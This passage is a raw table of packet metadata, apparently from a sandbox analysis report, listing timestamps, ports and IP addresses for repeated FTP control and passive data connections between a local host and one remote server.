Sep 27, 2024 13:12:58.828430891 CEST | 49780 | 57406 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:59.053177118 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:59.608923912 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:59.741053104 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:15.246606112 CEST | 49781 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:15.253818989 CEST | 21 | 49781 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:15.255680084 CEST | 49781 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:15.255680084 CEST | 49781 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:15.261090040 CEST | 21 | 49781 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:15.267432928 CEST | 49781 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:26.072145939 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:26.077079058 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:26.452203989 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:26.452831984 CEST | 49782 | 51546 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:26.460716009 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:26.460778952 CEST | 49782 | 51546 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:26.460886002 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:26.466106892 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.453784943 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.461007118 CEST | 49782 | 51546 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:27.468913078 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.469073057 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.469100952 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.469213009 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.469239950 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.469320059 CEST | 49782 | 51546 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:27.469579935 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.469588995 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.469594955 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.469603062 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.469690084 CEST | 49782 | 51546 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:27.469692945 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.475007057 CEST | 49782 | 51546 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:27.481846094 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.481857061 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.481868029 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.481889009 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.481897116 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.481905937 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.481914043 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.481920004 CEST | 49782 | 51546 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:27.481921911 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.481930971 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.481935024 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.481939077 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.481983900 CEST | 49782 | 51546 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:27.482739925 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.486968994 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.488734007 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.488749981 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.488758087 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.488902092 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.489161015 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.489168882 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.489906073 CEST | 51546 | 49782 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:27.491203070 CEST | 49782 | 51546 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:27.553255081 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:28.407711029 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:28.553220987 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:43.310105085 CEST | 49783 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:43.376849890 CEST | 21 | 49783 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:43.378640890 CEST | 49783 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:43.381428957 CEST | 49783 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:43.386570930 CEST | 21 | 49783 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:43.386666059 CEST | 49783 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:44.648521900 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:44.677779913 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.057925940 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.059056997 CEST | 49784 | 56668 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:45.075129032 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.075202942 CEST | 49784 | 56668 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:45.077049971 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:45.082439899 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.984015942 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.984380960 CEST | 49784 | 56668 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:45.989547014 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.989639997 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.989670038 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.989696980 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.989722013 CEST | 49784 | 56668 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:45.989723921 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.989753008 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.989772081 CEST | 49784 | 56668 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:45.989803076 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.989806890 CEST | 49784 | 56668 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:45.989833117 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.989859104 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.989891052 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.989933968 CEST | 49784 | 56668 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:45.989969015 CEST | 49784 | 56668 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:45.994796038 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.995007038 CEST | 49784 | 56668 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:45.996397972 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.996449947 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.996476889 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.996509075 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.996534109 CEST | 49784 | 56668 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:45.996536016 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.996577024 CEST | 49784 | 56668 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:45.996634960 CEST | 49784 | 56668 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:45.997206926 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:45.997392893 CEST | 49784 | 56668 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:46.000174999 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:46.002537966 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:46.002566099 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:46.002593994 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:46.002619982 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:46.003479004 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:46.003695965 CEST | 56668 | 49784 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:46.003900051 CEST | 49784 | 56668 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:46.037661076 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:46.922559023 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:47.053344965 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:52.715584040 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:52.721434116 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.077083111 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.077557087 CEST | 49785 | 61759 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.082598925 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.082673073 CEST | 49785 | 61759 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.082746029 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.087680101 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.282509089 CEST | 49786 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.287573099 CEST | 21 | 49786 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.287687063 CEST | 49786 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.287988901 CEST | 49786 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.293046951 CEST | 21 | 49786 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.294898033 CEST | 49786 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.906615019 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.906888962 CEST | 49785 | 61759 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.911917925 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.911947966 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.911994934 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.912020922 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.912025928 CEST | 49785 | 61759 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.912065029 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.912069082 CEST | 49785 | 61759 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.912097931 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.912177086 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.912203074 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.912211895 CEST | 49785 | 61759 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.912236929 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.912252903 CEST | 49785 | 61759 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.912283897 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.912487984 CEST | 49785 | 61759 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.917006969 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.917133093 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.917263031 CEST | 49785 | 61759 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.917300940 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.917349100 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.917411089 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.917438030 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.917464018 CEST | 49785 | 61759 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.917470932 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.917536020 CEST | 49785 | 61759 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.917536020 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.917583942 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.917613983 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.917659998 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.917690039 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.917692900 CEST | 49785 | 61759 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:53.917742014 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.922292948 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.922607899 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.922638893 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.922718048 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.922744989 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.922780991 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.922826052 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.922852039 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.923075914 CEST | 61759 | 49785 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:53.923321962 CEST | 49785 | 61759 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:54.053283930 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:54.731836081 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:54.850157976 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:57.559030056 CEST | 49787 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:57.564023018 CEST | 21 | 49787 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:57.566580057 CEST | 49787 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:57.566694975 CEST | 49787 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:13:57.571959019 CEST | 21 | 49787 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:13:57.574671984 CEST | 49787 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:01.758456945 CEST | 49788 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:01.763614893 CEST | 21 | 49788 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:01.763712883 CEST | 49788 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:01.763900042 CEST | 49788 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:01.769047022 CEST | 21 | 49788 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:01.769128084 CEST | 49788 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:02.400526047 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:02.469710112 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:02.839585066 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:02.839992046 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:02.844880104 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:02.845016956 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:02.845113993 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:02.849905968 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:03.993027925 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:03.995950937 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.056494951 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.215801001 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.216586113 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.217263937 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.217392921 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.217426062 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.217545033 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.217590094 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.217675924 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.217912912 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.218002081 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.218105078 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.218116999 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.218149900 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.218199015 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.218225002 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.218236923 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.218249083 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.218260050 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.218286991 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.218286991 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.222840071 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.222870111 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.222897053 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.222923040 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.222934961 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.222949982 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.222966909 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.222976923 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.222987890 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.222987890 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.223023891 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.223051071 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.223067045 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.223083973 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.223117113 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.223150969 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.223201990 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.227710009 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.227754116 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.227781057 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.227852106 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:04.227889061 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.228027105 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.228117943 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.232601881 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.232630968 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.232656956 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.232683897 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.232709885 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.232873917 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.233350992 CEST | 64095 | 49789 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:04.236573935 CEST | 49789 | 64095 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:05.018769026 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:05.240798950 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:12.715809107 CEST | 49790 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:12.720983982 CEST | 21 | 49790 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:12.721059084 CEST | 49790 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:12.806090117 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:12.811044931 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:12.947923899 CEST | 49791 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:12.952835083 CEST | 21 | 49791 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:12.952908039 CEST | 49791 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:13.186691046 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:13.187110901 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:13.192140102 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:13.192212105 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:13.192327976 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:13.197230101 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:13.666157007 CEST | 21 | 49790 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:13.666340113 CEST | 49790 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:13.671287060 CEST | 21 | 49790 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:13.965307951 CEST | 21 | 49791 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:13.965465069 CEST | 49791 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:13.970426083 CEST | 21 | 49791 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.024213076 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.024406910 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.032387018 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
